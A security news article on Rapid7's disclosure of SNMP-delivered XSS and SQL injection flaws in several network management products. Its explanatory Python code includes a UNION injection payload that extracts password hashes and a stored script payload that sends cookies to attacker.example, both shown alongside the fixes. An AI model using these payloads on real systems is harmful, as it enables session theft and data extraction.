
Critical Flaws Found in Network Management Systems

Rapid7 has reported and disclosed a half-dozen XSS and SQL injection flaws in popular network management systems, all of which can be reached via SNMP.

Update: Four leading network management system providers are busy patching and preparing fixes for a half-dozen critical cross-site scripting and SQL injection vulnerabilities disclosed Wednesday by Rapid7.

Three of the affected vendors, Spiceworks, Ipswitch and Opsview, have already patched their respective products, while Castle Rock Computing has yet to set a timeline for the availability of patches.

These management planes give enterprises a view into network activity and performance, and give attackers an attractive target. Access to such a management plane would be invaluable for mapping a network, finding pivot points to other systems and identifying existing vulnerabilities in anything the system manages.

“The fact that many of these protocols are delivered over SNMP is also very interesting; too often, designers of management software, which is intended for internal use, don’t consider the insider threat,” said Tod Beardsley, principal security research manager at Rapid7. Rapid7’s Deral Heiland and independent security researcher Matthew Kienow are credited with finding the vulnerabilities.

SNMP, the Simple Network Management Protocol, is the protocol over which most network management systems poll devices such as routers, servers and workstations for status, receive trap notifications from them and push configuration changes. In these flaws the direction that matters is the inbound one: strings the NMS receives from SNMP agents and traps are stored and later rendered in its web interface.

Opsview was the first to patch, releasing a fix on Nov. 6 for a stored XSS vulnerability in the Opsview web application server and a reflected XSS vulnerability in the client, affecting version 4.6.3. Payloads delivered via SNMP traps and the SNMP agent could inject code that executes in the victim’s browser; with an authenticated browser session, that could lead to further attacks, Rapid7 said.

Ipswitch, meanwhile, on Wednesday patched persistent XSS and SQL injection flaws in its WhatsUpGold network management system. Exploiting the SQL injection bug requires authentication, while the cross-site scripting vulnerability can be attacked without it. Versions 16.2.6 and 16.3.1 are affected, Rapid7 said.

To exploit the persistent XSS bug, an attacker would inject JavaScript into a number of fields; when WhatsUpGold displays those fields, the script executes with the privileges of the viewing user, allowing the attacker to modify settings, steal data or attack the host if it is configured with SNMP.

The SQL injection bug, available to an authenticated attacker, could allow data to be extracted from the database using tools such as sqlmap.
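The kind of extraction sqlmap automates is a UNION-based query that appends a second SELECT against a table the application never meant to expose. The following is an added illustration, not WhatsUpGold’s code or Rapid7’s proof of concept: a hypothetical device-search function built with string concatenation beside the parameterized fix, run against a constructed in-memory SQLite database. Table and column names are assumptions chosen for the example.

```python
import sqlite3


def make_db():
    """Constructed sample database: an NMS device list plus a user table an
    attacker would like to read. Data and schema are invented for the example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE devices(id INTEGER PRIMARY KEY, name TEXT, ip TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
        INSERT INTO devices(name, ip) VALUES
            ('core-sw-01', '10.0.0.5'),
            ('edge-rtr-02', '10.0.0.1');
        INSERT INTO users(username, pw_hash) VALUES
            ('admin', '$2b$12$constructedhash');
    """)
    return conn


def search_devices_vulnerable(conn, name):
    """Vulnerable: the user-supplied filter is spliced into the SQL text, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name, ip FROM devices WHERE name LIKE '%{name}%'"
    return conn.execute(sql).fetchall()


def search_devices_hardened(conn, name):
    """Fixed: the filter travels as a bound parameter and can only ever be a
    LIKE pattern, never additional SQL."""
    return conn.execute(
        "SELECT name, ip FROM devices WHERE name LIKE ?", (f"%{name}%",)
    ).fetchall()


# A hand-written version of the UNION technique sqlmap would discover and run.
# The trailing "--" comments out the "%'" the application appends.
UNION_PAYLOAD = "x' UNION SELECT username, pw_hash FROM users --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_devices_vulnerable(db, UNION_PAYLOAD))
    print("hardened:  ", search_devices_hardened(db, UNION_PAYLOAD))
```

Against the concatenated query the payload returns the admin row from `users`; against the parameterized one it returns nothing, because the same characters are matched as a literal device-name pattern. Note that parameterization fixes the injection but not the authorization question of who may search at all, which is why Rapid7’s authenticated-only qualifier still matters.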

Castle Rock Computing’s SNMPc Enterprise 9 and its web-based reporting and monitoring tool, SNMPc OnLine 12.1, are vulnerable to a persistent cross-site scripting flaw that can be exploited without authentication. As with the Ipswitch XSS bug, an attacker could inject JavaScript into fields, and the code executes once the NMS product displays those fields.
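The Opsview, Ipswitch and Castle Rock bugs share one mechanism: a string that arrives over SNMP (an agent’s sysName or sysDescr, or a trap varbind) is stored by the NMS and later written into an HTML page without encoding. The block below is an added example, not code from any of the affected products or from Rapid7; it simulates that rendering path with a constructed inventory, shows the output-encoding fix, and adds a defender-side check that flags SNMP string values carrying markup. Field names and the sample payload are assumptions for the illustration.

```python
import html
import re

# Constructed sample of what an SNMP poller might record per device. The second
# entry carries the kind of value a hostile agent, or anyone who can send a forged
# trap to the NMS, can supply in place of a hostname.
SNMP_INVENTORY = [
    {"ip": "10.0.0.5", "sysName": "core-sw-01", "sysDescr": "Cisco IOS Software"},
    {
        "ip": "10.0.0.99",
        "sysName": '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
        "sysDescr": "Linux",
    },
]


def render_vulnerable(devices):
    """Vulnerable: SNMP-sourced strings are interpolated straight into HTML, so
    whatever the agent returned is handed to the administrator's browser as markup."""
    rows = "".join(
        f"<tr><td>{d['ip']}</td><td>{d['sysName']}</td><td>{d['sysDescr']}</td></tr>"
        for d in devices
    )
    return f"<table>{rows}</table>"


def render_hardened(devices):
    """Fixed: every SNMP-sourced value is HTML-encoded on output. The payload is
    still stored (the NMS should show what the device claimed), but it is shown
    as text, not executed."""
    rows = "".join(
        "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            html.escape(d["ip"]), html.escape(d["sysName"]), html.escape(d["sysDescr"])
        )
        for d in devices
    )
    return f"<table>{rows}</table>"


SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def contains_live_script(page):
    """Crude check used here to compare the two renderers: is there an
    un-encoded <script tag in the page?"""
    return bool(SCRIPT_TAG.search(page))


# Defender-side triage: hostnames and descriptions should never contain HTML
# metacharacters, a javascript: URL or an inline event handler.
HTML_META = re.compile(r"""[<>"']|javascript:|\bon\w+\s*=""", re.IGNORECASE)


def suspicious_snmp_values(devices):
    """Return (ip, field) pairs whose SNMP value looks like markup rather than
    a hostname. Useful as a log-review or poller-side alert, not as the fix."""
    hits = []
    for d in devices:
        for field in ("sysName", "sysDescr"):
            if HTML_META.search(d[field]):
                hits.append((d["ip"], field))
    return hits


if __name__ == "__main__":
    print("vulnerable page runs script:", contains_live_script(render_vulnerable(SNMP_INVENTORY)))
    print("hardened page runs script:  ", contains_live_script(render_hardened(SNMP_INVENTORY)))
    print("suspicious values:", suspicious_snmp_values(SNMP_INVENTORY))
```

The fix belongs on output, where the context is known; filtering on input is a reasonable alerting signal (an agent reporting a sysName with angle brackets is worth a look) but not a substitute, because the same stored value may later be rendered into an attribute, a script block or a JSON response where a different encoding is needed.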

These flaws were discovered Sept. 14 and disclosed to the DHS-sponsored CERT at Carnegie Mellon University, and have yet to be addressed by the vendor.

This article was updated to include clarifications regarding Ipswitch’s patches released Dec. 16.

Authors

Threatpost
